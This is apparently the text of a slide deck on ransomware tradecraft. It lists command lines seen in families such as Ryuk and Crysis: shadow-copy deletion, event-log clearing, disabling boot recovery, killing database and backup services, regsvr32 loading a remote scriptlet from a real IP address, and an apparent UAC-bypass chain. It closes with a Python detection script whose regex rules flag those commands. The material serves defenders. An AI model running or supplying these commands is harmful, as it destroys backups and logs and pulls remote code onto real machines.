COMMON RANSOMWARE FLOW
COMMANDS USED IN RYUK RANSOMWARE
WIPER ACTIVITY (DESTROYING MBR AND THE FILE-SYSTEM)
CRYSIS RANSOMWARE
Ransomware LATERAL MOVEMENT VIA PSEXEC
ENUMERATION
PROPAGATION
LATERAL MOVEMENT VIA VULNERABILITY
RANSOMWARE VIA ASSEMBLIES
MATRIX RANSOMWARE
HDDCRYPTOR MAMBA RANSOMWARE
PETYA NOT!PETYA
MACRO BASED RANSOMWARE
RYUK RANSOMWARE
SCARAB RANSOMWARE
SOME OF THE COMMANDS USED
regsvr32 C:\WINDOWS\Media\ActiveX.ocx /s
"C:\qrmbg\..\Windows\n\twvs\..\..\system32\snv\wxqrm\kpow\..\..\..\wbem\uvwhg\h\..\..\wmic.exe" shadowcopy delete
"C:\Windows\System32\mshta.exe" "C:\Users\foo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
"C:\jrd\cqsa\..\..\Windows\vlg\f\..\..\system32\nvv\krf\..\..\wbem\cft\bh\qht\..\..\..\wmic.exe" shadowcopy delete
/c wevtutil cl Application
/c wevtutil cl security
wevtutil cl security
/c wevtutil cl setup
/c wevtutil cl system
/c vssadmin.exe Delete Shadows /All /Quiet
/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE
WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE
/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE
/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE
/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE
/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE
/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE
/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE
/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE
/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE
/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE
/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'
/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'
sc config FirebirdServerDefaultInstance start= disabled
/c taskkill /IM fb_inet_server.exe /F
/c net stop FirebirdServerDefaultInstance
net stop FirebirdServerDefaultInstance
C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
/c taskkill /IM sqlservr.exe /F
taskkill /IM sqlservr.exe /F
/c sc config MSSQLSERVER start= disabled
/c taskkill /IM pg_ctl.exe /F
/c sc config postgresql-9.0 start= disabled
/c sc config MSExchangeAB start= disabled
/c sc config MSExchangeMailSubmission start= disabled
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe /c tAskkill /F /IM mysqld.exe&tAskkill /F /IM httpd.exe&tAskkill /F /IM sqlservr.exe&tAskkill /F /IM sqlwriter.exe&tAskkill /F /IM w3wp.exe
&tAskkill /F /IM sqlagent.exe&tAskkill /F /IM orac
regsvr32 /u /s /i:http://94.103.86.99/s/svchosts.bmp scrobj.dll
C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet&vssadmin delete shadows /all /quiet
vssadmin delete shadows /all /quiet
• C:\Windows\explorer.exe C:\Windows\System32\CompMgmtLauncher.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
• C:\Windows\System32\CompMgmtLauncher.exe
• consent.exe 940 358 000000000421F180
• C:\Windows\system32\mmc.exe C:\Windows\system32\compmgmt.msc /s C:\Windows\System32\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures vssadmin.exe Delete Shadows /All /Quiet
• C:\Windows\system32\vssvc.exe
• C:\Windows\explorer.exe C:\Windows\System32\CompMgmtLauncher.exe
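The command lines above share a handful of behaviours a defender can key on: shadow copy deletion (vssadmin / wmic shadowcopy), event log clearing (wevtutil cl), disabling boot recovery (bcdedit), stopping or disabling database and backup services (WMIC STOPSERVICE, sc config, net stop, taskkill), remote scriptlet loading through regsvr32 with scrobj.dll, an .hta ransom note dropped in the Startup folder, and image paths padded with "..\" segments so that a plain string match on "wbem\wmic.exe" never fires. The script below is an added example, not part of the original slides: it normalizes each command line by collapsing the dot-segments of any drive-rooted path, then runs a small rule set over the result. The sample log is constructed from the commands listed on this page; the rule names, the regexes and the collapse_dots / analyze / scan helpers are the example's own choices, not a vendor's detection content.

```python
import re

# Collapse "\..\" and "\.\" segments in a Windows path so that a padded image
# path such as C:\x\..\Windows\...\wmic.exe resolves to the real binary.
# The drive element is never popped, matching how Windows resolves "C:\..\".
def collapse_dots(path: str) -> str:
    out = []
    for seg in path.split("\\"):
        if seg == "..":
            if len(out) > 1:
                out.pop()
        elif seg != ".":
            out.append(seg)
    return "\\".join(out)

# A drive-rooted path token: letter, colon, backslash, then no quote/whitespace.
WIN_PATH = re.compile(r'[A-Za-z]:\\[^"\s]+')

def normalize_command_line(cmdline: str) -> str:
    """Rewrite every drive-rooted path token with its dot-segments collapsed."""
    return WIN_PATH.sub(lambda m: collapse_dots(m.group(0)), cmdline)

# Detection rules (example labels, not a standard taxonomy). Each regex is
# applied case-insensitively to the normalized command line.
RULES = {
    "shadow_copy_deletion": re.compile(
        r'vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?"?\s+shadowcopy\s+delete', re.I),
    "event_log_cleared": re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I),
    "boot_recovery_disabled": re.compile(
        r"bcdedit.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I),
    "service_tampering": re.compile(
        r"wmic\s+service\s+where\b.*\bcall\s+(stopservice|changestartmode)"
        r"|\bsc\s+config\s+\S+\s+start=\s*disabled"
        r"|\bnet1?\s+stop\s+\S+"
        r"|\btaskkill\b.*/IM\s+(sqlservr|mysqld|pg_ctl|fb_inet_server|sqlwriter|sqlagent|httpd|w3wp)",
        re.I),
    "regsvr32_remote_scriptlet": re.compile(
        r"\bregsvr32(\.exe)?\b.*/i:https?://\S+\s+scrobj\.dll", re.I),
    "mshta_startup_hta": re.compile(r'mshta(\.exe)?"?\s+.*\\Startup\\[^"]*\.hta', re.I),
}

def analyze(cmdline: str) -> dict:
    """Tag one process command line; tags are sorted for stable comparison."""
    norm = normalize_command_line(cmdline)
    tags = {label for label, rx in RULES.items() if rx.search(norm)}
    # Flag "..\" padding whenever normalization actually changed a path.
    if "\\..\\" in cmdline and norm != cmdline:
        tags.add("path_obfuscation")
    return {"raw": cmdline, "normalized": norm, "tags": sorted(tags)}

def scan(lines):
    """Return only the command lines that triggered at least one rule."""
    return [hit for hit in (analyze(line) for line in lines) if hit["tags"]]

# Constructed sample log: command lines taken from the list on this page,
# plus one benign line (cmd.exe /c cls) that should not trigger anything.
SAMPLE_LOG = [
    r'"C:\qrmbg\..\Windows\n\twvs\..\..\system32\snv\wxqrm\kpow\..\..\..\wbem\uvwhg\h\..\..\wmic.exe" shadowcopy delete',
    r'"C:\Windows\System32\mshta.exe" "C:\Users\foo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"',
    "/c wevtutil cl security",
    "/c vssadmin.exe Delete Shadows /All /Quiet",
    "/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE",
    "sc config FirebirdServerDefaultInstance start= disabled",
    "/c taskkill /IM sqlservr.exe /F",
    r"C:\Windows\system32\cmd.exe /c cls",
    "regsvr32 /u /s /i:http://94.103.86.99/s/svchosts.bmp scrobj.dll",
    r"C:\Windows\System32\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(", ".join(hit["tags"]), "<-", hit["normalized"][:80])
```

Normalizing before matching is the point of the example: the two wmic.exe lines on this page resolve to C:\Windows\system32\wbem\wmic.exe once the "..\" segments are collapsed, and the fact that normalization changed the path is itself worth a tag, since legitimate software rarely launches system binaries through padded paths. In a real pipeline the same normalization should be applied to the parent image path as well, so that the CompMgmtLauncher.exe -> mmc.exe -> cmd.exe chain above can be correlated with the vssadmin and bcdedit tags.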
SOME OTHER (RANSOMWARE) FLOWS AND LATERAL MOVEMENT
USE OF OBFUSCATION
Ransomware Executing Commands
Encrypting Files via 3rd party open source libraries
Avoiding the use of vssadmin
THE END